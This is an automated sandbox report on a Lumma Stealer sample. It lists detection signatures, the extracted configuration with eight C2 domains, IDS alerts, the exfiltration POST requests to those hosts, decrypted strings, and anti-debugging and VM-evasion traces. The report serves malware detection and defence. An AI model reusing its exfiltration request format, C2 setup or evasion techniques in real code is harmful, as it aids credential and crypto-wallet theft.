
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1544423
MD5: dc20ee0ac31f3e17cbd727de4644f7aa
SHA1: 7b688e73f50ac2a4241681e996410efeec4e0775
SHA256: d20226e20ceb5d5f0440c642f10506fbdceaa23e3c598478118e46f0dd932990
Tags: exe, user-Bitsight

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 2736 cmdline: "C:\Users\user\Desktop\file.exe" MD5: DC20EE0AC31F3E17CBD727DE4644F7AA)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware configuration:
{"C2 url": ["necklacedmny.store", "founpiuer.store", "thumbystriw.store", "presticitpo.store", "navygenerayk.store", "crisiwarny.store", "scriptyprefej.store", "fadehairucw.store"], "Build id": "4SD0y4--legendaryy"}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security

Source | Rule | Description | Author
00000000.00000003.2543832248.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2544005509.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2571721214.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2556757347.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2575722256.0000000000DB8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(5 further entries not shown)

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-29T12:04:10.277153+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49709 | 188.114.96.3 | 443 | TCP
2024-10-29T12:04:12.556685+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49710 | 188.114.96.3 | 443 | TCP
2024-10-29T12:04:10.277153+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.6 | 49709 | 188.114.96.3 | 443 | TCP
2024-10-29T12:04:12.556685+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.6 | 49710 | 188.114.96.3 | 443 | TCP
2024-10-29T12:04:50.576456+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49712 | 188.114.96.3 | 443 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: file.exe.2736.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["necklacedmny.store", "founpiuer.store", "thumbystriw.store", "presticitpo.store", "navygenerayk.store", "crisiwarny.store", "scriptyprefej.store", "fadehairucw.store"], "Build id": "4SD0y4--legendaryy"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: scriptyprefej.store
Source: 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: navygenerayk.store
Source: 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: founpiuer.store
Source: 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: necklacedmny.store
Source: 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: thumbystriw.store
Source: 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: fadehairucw.store
Source: 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: crisiwarny.store
Source: 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: presticitpo.store
Source: 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: 4SD0y4--legendaryy
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49899 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49908 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49919 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49989 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49992 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Comms
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Packages
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\3D Objects
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\PeerDistRepub
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google

Networking

Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49709 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49709 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49710 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49710 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49712 -> 188.114.96.3:443
Source: Malware configuration extractor | URLs: necklacedmny.store
Source: Malware configuration extractor | URLs: founpiuer.store
Source: Malware configuration extractor | URLs: thumbystriw.store
Source: Malware configuration extractor | URLs: presticitpo.store
Source: Malware configuration extractor | URLs: navygenerayk.store
Source: Malware configuration extractor | URLs: crisiwarny.store
Source: Malware configuration extractor | URLs: scriptyprefej.store
Source: Malware configuration extractor | URLs: fadehairucw.store
Source: Joe Sandbox View | IP Address: 188.114.96.3
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: necklacedmny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 52 | Host: necklacedmny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12864 | Host: necklacedmny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15110 | Host: necklacedmny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 19968 | Host: necklacedmny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1227 | Host: necklacedmny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 571410 | Host: necklacedmny.store
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: presticitpo.store
Source: global traffic | DNS traffic detected: DNS query: crisiwarny.store
Source: global traffic | DNS traffic detected: DNS query: fadehairucw.store
Source: global traffic | DNS traffic detected: DNS query: thumbystriw.store
Source: global traffic | DNS traffic detected: DNS query: necklacedmny.store
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: necklacedmny.store
              Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49992
              Source: unknown | Network traffic detected: HTTP traffic on port 49919 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49989 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49899 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49908 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49908
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49919
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknown | Network traffic detected: HTTP traffic on port 49992 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49989
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49899
              Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49709 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49710 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49712 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49899 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49908 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49919 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49989 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49992 version: TLS 1.2

              System Summary

              Source: file.exe | Static PE information: section name:
              Source: file.exe | Static PE information: section name: .rsrc
              Source: file.exe | Static PE information: section name: .idata
              Source: C:\Users\user\Desktop\file.exe | Process Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_00D96A0A
              Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exe | Static PE information: Section: ZLIB complexity 0.9979489126175548
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@5/1
              Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: file.exe, 00000000.00000003.2544380146.0000000005607000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2165195321.0000000005606000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2165504663.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2544577650.0000000000DD6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
              Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: webio.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: schannel.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: mskeyprotect.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: ncryptsslp.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: dpapi.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: wbemcomn.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
              Source: file.exe | Static file information: File size 2922496 > 1048576
              Source: file.exe | Static PE information: Raw size of eijsszyp is bigger than: 0x100000 < 0x29e200

              Data Obfuscation

              Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.d0000.0.unpack :EW;.rsrc :W;.idata :W;eijsszyp:EW;xxbxeocn:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;eijsszyp:EW;xxbxeocn:EW;.taggant:EW;
              Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
              Source: file.exe | Static PE information: real checksum: 0x2d7e89 should be: 0x2d0363
              Source: file.exe | Static PE information: section name:
              Source: file.exe | Static PE information: section name: .rsrc
              Source: file.exe | Static PE information: section name: .idata
              Source: file.exe | Static PE information: section name: eijsszyp
              Source: file.exe | Static PE information: section name: xxbxeocn
              Source: file.exe | Static PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_00D95DC6 pushad ; iretd 0_3_00D95DCA
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_00D98CF8 pushad ; ret 0_3_00D98CF9
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_00D95CE5 push ss; retf 0_3_00D95D1E
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_00D94785 pushfd ; retf 0_3_00D95038
              Source: file.exe | Static PE information: section name: entropy: 7.978490875244356

              Boot Survival

              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Filemonclass
              Source: C:\Users\user\Desktop\file.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
              Source: C:\Users\user\Desktop\file.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
              Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\file.exe | System information queried: FirmwareTableInformation
              Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2A0F77 second address: 2A0F87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F0CB0E1B256h 0x0000000a jns 00007F0CB0E1B256h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2A0F87 second address: 2A0F8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2A0F8B second address: 2A0F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F0CB0E1B256h 0x0000000e jng 00007F0CB0E1B256h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2A0F9F second address: 2A0FB1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0CB0C50336h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2A0FB1 second address: 2A0FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2A0FB9 second address: 2A0FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F0CB0C5033Eh 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jne 00007F0CB0C50336h 0x00000013 pushad 0x00000014 jmp 00007F0CB0C50348h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 29FFDE second address: 29FFFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B269h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2A02C0 second address: 2A02DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F0CB0C50344h 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2A0436 second address: 2A043A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2A36D7 second address: 2A373F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F0CB0C50342h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jnp 00007F0CB0C5033Ch 0x00000013 jng 00007F0CB0C50336h 0x00000019 push eax 0x0000001a jmp 00007F0CB0C5033Ah 0x0000001f pop eax 0x00000020 popad 0x00000021 nop 0x00000022 mov si, 43F0h 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push edi 0x0000002b call 00007F0CB0C50338h 0x00000030 pop edi 0x00000031 mov dword ptr [esp+04h], edi 0x00000035 add dword ptr [esp+04h], 0000001Ah 0x0000003d inc edi 0x0000003e push edi 0x0000003f ret 0x00000040 pop edi 0x00000041 ret 0x00000042 mov dl, 11h 0x00000044 push B5687DAFh 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c push edx 0x0000004d pop edx 0x0000004e rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2A373F second address: 2A3743 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2A3743 second address: 2A374E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2A3993 second address: 2A39AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0CB0E1B266h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2A39AD second address: 2A39B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2A3AEE second address: 2A3AFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0CB0E1B25Dh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2B61EC second address: 2B61F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2B61F0 second address: 2B620E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0CB0E1B264h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2C1F64 second address: 2C1F6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2C1F6A second address: 2C1F91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0CB0E1B268h 0x0000000e jp 00007F0CB0E1B256h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2C1F91 second address: 2C1F9B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2C1F9B second address: 2C1FA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2C1FA1 second address: 2C1FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2C1FA5 second address: 2C1FA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2C1FA9 second address: 2C1FAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2C1FAF second address: 2C1FB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2C211B second address: 2C2121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 2C2265 second address: 2C2270 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F0CB0E1B256h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
